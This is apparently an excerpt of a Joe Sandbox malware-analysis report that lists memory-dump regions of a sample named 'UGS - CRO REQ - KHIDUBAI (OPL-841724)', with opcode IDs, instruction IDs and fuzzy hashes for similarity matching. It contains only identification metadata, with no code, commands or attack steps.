                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 34a7483b990e6c882c62d131749c408f7bf72b4fe3b6808467b61d60a90af59a
                                                                                                                                                    • Instruction ID: 1cba19ae311b3ff710a65826a5291d9caa3af0e085440b1c4e8a964529ff02bf
                                                                                                                                                    • Opcode Fuzzy Hash: 34a7483b990e6c882c62d131749c408f7bf72b4fe3b6808467b61d60a90af59a
                                                                                                                                                    • Instruction Fuzzy Hash: 8FF02462B8D2904FE32A03382C20326BFA29F83310F1840ABD5858F3E2C956DC038390
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 06347c8854e0924b988d4b4c44f17b4f7a197794cd09d81bf8012be61171213c
                                                                                                                                                    • Instruction ID: 997abb637c14b7fe829ace963c3242475f76830700fe12b8d85944c23ed2458a
                                                                                                                                                    • Opcode Fuzzy Hash: 06347c8854e0924b988d4b4c44f17b4f7a197794cd09d81bf8012be61171213c
                                                                                                                                                    • Instruction Fuzzy Hash: 50F0E931B443115FE3288619981476BF7AAEBC9720F144069E9099F3D0CE71EC4287C4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b37cd8c9b4d8c1f74c84e9ca00bda145305f9c1b4a2866eb67cdf041243eb32d
                                                                                                                                                    • Instruction ID: 8ea062aab3e84a776b55004110ffb79adf641b55b440f700f2c12431b5b20f1f
                                                                                                                                                    • Opcode Fuzzy Hash: b37cd8c9b4d8c1f74c84e9ca00bda145305f9c1b4a2866eb67cdf041243eb32d
                                                                                                                                                    • Instruction Fuzzy Hash: C8112974905619CFC764CF24C944A99BBB1FF49301F1085EBE40AAB3A1D735AD84DF10
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 67e97483438ba82d543cf220e2dafb91316be31bfe12b2b20f1f88063d41bd75
                                                                                                                                                    • Instruction ID: c7e617f72e1d8a6ce6f2cf16f57a143da9235507edd9c9ca47375576f4311825
                                                                                                                                                    • Opcode Fuzzy Hash: 67e97483438ba82d543cf220e2dafb91316be31bfe12b2b20f1f88063d41bd75
                                                                                                                                                    • Instruction Fuzzy Hash: 5BF0E2213987901BC72E136498202BF2BDB4BC1760F1484BFE845C76D3CA698C0683D5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: cc23b17befc3b0752720e09ba6cfdfe8e64a827fbd7c609e5ef0482fadfb1c64
                                                                                                                                                    • Instruction ID: c2646d2c16bbcf3ff8b224a40f66fadee1b2ec9f48998778bda9c344957cd085
                                                                                                                                                    • Opcode Fuzzy Hash: cc23b17befc3b0752720e09ba6cfdfe8e64a827fbd7c609e5ef0482fadfb1c64
                                                                                                                                                    • Instruction Fuzzy Hash: 1701DC35E00225DFCB61EF56D8046F9B7B0AF59318F0584E9D849A3390EB786E86DF81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9ebd20cf7dadd716148ba3eaaeda0660597c0859490033e6f8ba019c8a023600
                                                                                                                                                    • Instruction ID: c95b2db4167752ea5df676c4ab260f4f2082bebc819e5202e91f5b4a54016968
                                                                                                                                                    • Opcode Fuzzy Hash: 9ebd20cf7dadd716148ba3eaaeda0660597c0859490033e6f8ba019c8a023600
                                                                                                                                                    • Instruction Fuzzy Hash: 49F0A93160A2008BE714DEA5D4157E972B3AB42711F2CC575D4018B2D9C339EDC6CBB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 62c53d373da09da41777f9f4ae577c38bee99e07f33fc858ad21acbcba2b5b4d
                                                                                                                                                    • Instruction ID: acf86ba9e520a02daaa94dd8ab25282630b076b6b937f17ea6debd2bb7f96701
                                                                                                                                                    • Opcode Fuzzy Hash: 62c53d373da09da41777f9f4ae577c38bee99e07f33fc858ad21acbcba2b5b4d
                                                                                                                                                    • Instruction Fuzzy Hash: 74F082322057866BC3129B29E898A8BBFA69ED22203548C77D449CB177C978D94E8790
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2acf2d6cf24aed5b31c82c8ba1b5d4272a786b0b86c08ac5702c8b4b6873815b
                                                                                                                                                    • Instruction ID: bc8fe5ed04f70b0c9b91272660104938ed5efd590dfb3197388d09f9c6e83f39
                                                                                                                                                    • Opcode Fuzzy Hash: 2acf2d6cf24aed5b31c82c8ba1b5d4272a786b0b86c08ac5702c8b4b6873815b
                                                                                                                                                    • Instruction Fuzzy Hash: 03F01D393406009FC3199B58D858E3A77A6FFC9721B1445AEF946CB7A0CA31DC42DB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 87bec91a540a5c85347b731a97b38a0b0ddb17b4b508b6e5dbf4aa0b459cae93
                                                                                                                                                    • Instruction ID: afd0010fe9fc7901bdc8a5057cfc9b64e7135f7507879cc2353a349cf1e8e07f
                                                                                                                                                    • Opcode Fuzzy Hash: 87bec91a540a5c85347b731a97b38a0b0ddb17b4b508b6e5dbf4aa0b459cae93
                                                                                                                                                    • Instruction Fuzzy Hash: D0F0F6319482498FCB18DB94CD149DFBBF2AF89310F20846ED002B7291CBB90D458FA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4e051343cf2de749a8f03822e57776e94517e371a26345611f5000a73901df64
                                                                                                                                                    • Instruction ID: 65ad5ae4c51f760cb71eef7d2130136fdda37e073565389617538c4550cae132
                                                                                                                                                    • Opcode Fuzzy Hash: 4e051343cf2de749a8f03822e57776e94517e371a26345611f5000a73901df64
                                                                                                                                                    • Instruction Fuzzy Hash: 0C019774E483288FCB55EF54D949ADAB7B1EF89300F0080E9D40DA7395DA386E84DF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 683f30089e90e437d218877d552a7648035a9b2db36ada553bd56fec78df2ff9
                                                                                                                                                    • Instruction ID: 584e1d564dfc1512590a81b0506ce9eee0b22c5b859dc528444142e13b5f512a
                                                                                                                                                    • Opcode Fuzzy Hash: 683f30089e90e437d218877d552a7648035a9b2db36ada553bd56fec78df2ff9
                                                                                                                                                    • Instruction Fuzzy Hash: 4EF05E393402009FC318DB19D898E2A77AAFFC8721F10446AF9068B3B0CA31EC42DB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6e0eb8d6b62b837bc84e051d715ee4d1c4b252b9274ba0682b4146ca762ca3e4
                                                                                                                                                    • Instruction ID: e99bfb05a31aa15126a2f8cd4dc7e49eff23f794bffa1450dd8bdda0e3da20c5
                                                                                                                                                    • Opcode Fuzzy Hash: 6e0eb8d6b62b837bc84e051d715ee4d1c4b252b9274ba0682b4146ca762ca3e4
                                                                                                                                                    • Instruction Fuzzy Hash: 78E01A6130032427D31C266A6C62B6FA98EDBC5760F69852EB509CB39ACCA29D0243E5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 19df94f024089bf0f175602b39744dc9615f5107787c27ba820de9acfebc0e06
                                                                                                                                                    • Instruction ID: 2835ac0ff754ba549a627644ae473a0bcffe8faec4d4efb23c4ac9257d292552
                                                                                                                                                    • Opcode Fuzzy Hash: 19df94f024089bf0f175602b39744dc9615f5107787c27ba820de9acfebc0e06
                                                                                                                                                    • Instruction Fuzzy Hash: D001EC34A062188FDB54EF58D995AEEB7F1EF89300F1050E6A409A7395CB346F80CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9a507f031f3f17fdee5869241e4bf2673551a4bbd4b65254a849da81d99aa616
                                                                                                                                                    • Instruction ID: 12020aa0b5ea9cf3865e9a24b5e90efb98ee7f5f26b02ac98ab4aa5a5533e120
                                                                                                                                                    • Opcode Fuzzy Hash: 9a507f031f3f17fdee5869241e4bf2673551a4bbd4b65254a849da81d99aa616
                                                                                                                                                    • Instruction Fuzzy Hash: 73F03731604204CBE704DF84E469BE9B3B3BB46700F28C0A4E6011F299C375AE869BA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f151ffffe90d7d9502f9431a058ab83e34325dabc674f5ace0f2ccda7c212865
                                                                                                                                                    • Instruction ID: b5118cf12877506cafd17175ef83310f7611256580a49806d7c7563a9c44d42f
                                                                                                                                                    • Opcode Fuzzy Hash: f151ffffe90d7d9502f9431a058ab83e34325dabc674f5ace0f2ccda7c212865
                                                                                                                                                    • Instruction Fuzzy Hash: D8E012326152149FC754DAA8A4406DA77FED748665B18406BD509C3640EA32984187A0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0bae06f1f05c88a772bac2cc059fafdf749baf26a725544d3ba4570e7cca063d
                                                                                                                                                    • Instruction ID: 24438e54dcb30dbaa2b022496dfd804ea9e6b917a4df60512b601158fdda6a35
                                                                                                                                                    • Opcode Fuzzy Hash: 0bae06f1f05c88a772bac2cc059fafdf749baf26a725544d3ba4570e7cca063d
                                                                                                                                                    • Instruction Fuzzy Hash: B7F027B190E284EFC709CB609C114FE7B769B5230072844EFD447C7252E6364B46A711
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e0d7355795906b5c629e324d43b2df7318415ba265ce2f495207863d0c2c0418
                                                                                                                                                    • Instruction ID: 28aba76c284982f35be6768ed718bc7688545bfc7bba88703780c68cd52b0527
                                                                                                                                                    • Opcode Fuzzy Hash: e0d7355795906b5c629e324d43b2df7318415ba265ce2f495207863d0c2c0418
                                                                                                                                                    • Instruction Fuzzy Hash: DAF0E572F001168FCB206B68E8483EA37639B683A1B2D8D37C8058B395DD209CC69B91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ac8027ee66edcec15d7b5a11abd312872053b39c6a64d003d5a036571857d4c2
                                                                                                                                                    • Instruction ID: c25c76fba3a5794b7918be0f89af57357042566c4a28ada89add9ae944cbf896
                                                                                                                                                    • Opcode Fuzzy Hash: ac8027ee66edcec15d7b5a11abd312872053b39c6a64d003d5a036571857d4c2
                                                                                                                                                    • Instruction Fuzzy Hash: 49F03774945618CFC720CF24C898998BBB1FF09306F2184DAD41AEB361DB75AD85CF01
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 59d38c62cce24b4007b18aacd6a3975d94f641c4248514e9abdcb9b2e5a9328a
                                                                                                                                                    • Instruction ID: f90551622a766401a70b425d831404f4ba34e5194078840ac23c76c3d4605f30
                                                                                                                                                    • Opcode Fuzzy Hash: 59d38c62cce24b4007b18aacd6a3975d94f641c4248514e9abdcb9b2e5a9328a
                                                                                                                                                    • Instruction Fuzzy Hash: D5E0A0716083806FC302DB2CE8D1684AFA66F86210B1985A6C004CB656CE64DD0887A0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c1fc416f86ec5394f2569d691687a7d715a26ee6a5a3fd530732f8a2862f2f0b
                                                                                                                                                    • Instruction ID: 21992ca51de4ccd2f1b28c22ad54a16a84e70450ea1f43ce2887b79a18d65dac
                                                                                                                                                    • Opcode Fuzzy Hash: c1fc416f86ec5394f2569d691687a7d715a26ee6a5a3fd530732f8a2862f2f0b
                                                                                                                                                    • Instruction Fuzzy Hash: F5F06537148148AFCB02CF94EC41CE67F71EF4A210708809BFD158B221C672D866EF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a07fd66a9540bc92cd5fc34be65fe2669c5ce34bebea3a07540fd18c6629a728
                                                                                                                                                    • Instruction ID: 328a03fe98f30e2ff4c636c62310342a50dd4e65e9779f92afded479f2605ab2
                                                                                                                                                    • Opcode Fuzzy Hash: a07fd66a9540bc92cd5fc34be65fe2669c5ce34bebea3a07540fd18c6629a728
                                                                                                                                                    • Instruction Fuzzy Hash: 44E022B220E3C14FC323873CAD2006A3FE18B9620038846DBC0C4CB2D7E958CC0B8712
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 45098f965b836c9f0c9aa25d40af418adf9636ff7d6432aa11e29af199c5b4e3
                                                                                                                                                    • Instruction ID: afd30b187a53720b0ed17d6c267bf2032f6594a1d96cc12cb91ce5f064ded2a5
                                                                                                                                                    • Opcode Fuzzy Hash: 45098f965b836c9f0c9aa25d40af418adf9636ff7d6432aa11e29af199c5b4e3
                                                                                                                                                    • Instruction Fuzzy Hash: 7EF05E306042008BDB10DF84D865BEA73B3AB46700F18C465D6051F385C734AC868BA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 00d67172db1a7ac183d9de1f38760ae5a26e0b69c3f16e65027b32d99449a3c1
                                                                                                                                                    • Instruction ID: 0afff4a7f284322edae81a5e2a259aa29e01b09c446cca7d8aca2ba9b2b707f0
                                                                                                                                                    • Opcode Fuzzy Hash: 00d67172db1a7ac183d9de1f38760ae5a26e0b69c3f16e65027b32d99449a3c1
                                                                                                                                                    • Instruction Fuzzy Hash: C9E0123154D1C44FC357C7A4E8A18A87FB19E9711432885EFD449CF7A3CA23980BCB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c69c8ffe593bc1e1b878125fdf687235b478bf6be40095f09f78f26c0f229ab7
                                                                                                                                                    • Instruction ID: 6bb9e9426b6a70f4e9b99774652cd59f0c321fe84bc3f2a539ec1d7303e46e92
                                                                                                                                                    • Opcode Fuzzy Hash: c69c8ffe593bc1e1b878125fdf687235b478bf6be40095f09f78f26c0f229ab7
                                                                                                                                                    • Instruction Fuzzy Hash: 65E0DF313850505FC7288A5DAC54CFB7BA98ED6B2231840AFF406CB761CA718C43DB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2beba1b246ccdd4e5c93c21589cf0ef28cf253cadf6eee1ecffdb560fdfef803
                                                                                                                                                    • Instruction ID: acfe57c0a9fbfd63b348b5e1f9981041396d280553ad3d517cac49a17f880c97
                                                                                                                                                    • Opcode Fuzzy Hash: 2beba1b246ccdd4e5c93c21589cf0ef28cf253cadf6eee1ecffdb560fdfef803
                                                                                                                                                    • Instruction Fuzzy Hash: C6F0FE34A042048FCB44EF95E4556EE77B3EF8A710F289166D4029B399C7349D86DBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b5957f5cce48e3255d46b05d0f54a2b33edba5487e2a1b5cda4bd24f6a43c90f
                                                                                                                                                    • Instruction ID: 0e08844c29e2e8e97bba847e779014e40964473e36d4a2fcb3de9bca4a944250
                                                                                                                                                    • Opcode Fuzzy Hash: b5957f5cce48e3255d46b05d0f54a2b33edba5487e2a1b5cda4bd24f6a43c90f
                                                                                                                                                    • Instruction Fuzzy Hash: DDE012723003596BC7119B1AE889E4BFB9ADFD03243908D3AD54A87125DA74E90E8794
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c7543103d4050f424b88b4db4668d8ef9916262c89bc977b8550e5341f9988c7
                                                                                                                                                    • Instruction ID: 0950dec00b8c4f8e054d656ff63f5d42cff535f9c6eb7e7f1f071d8600f799b2
                                                                                                                                                    • Opcode Fuzzy Hash: c7543103d4050f424b88b4db4668d8ef9916262c89bc977b8550e5341f9988c7
                                                                                                                                                    • Instruction Fuzzy Hash: D6F0A475A01118CFDB64DF28D854AA8B7B1FB49311F1081D7D849A7321CB31AD45CF51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
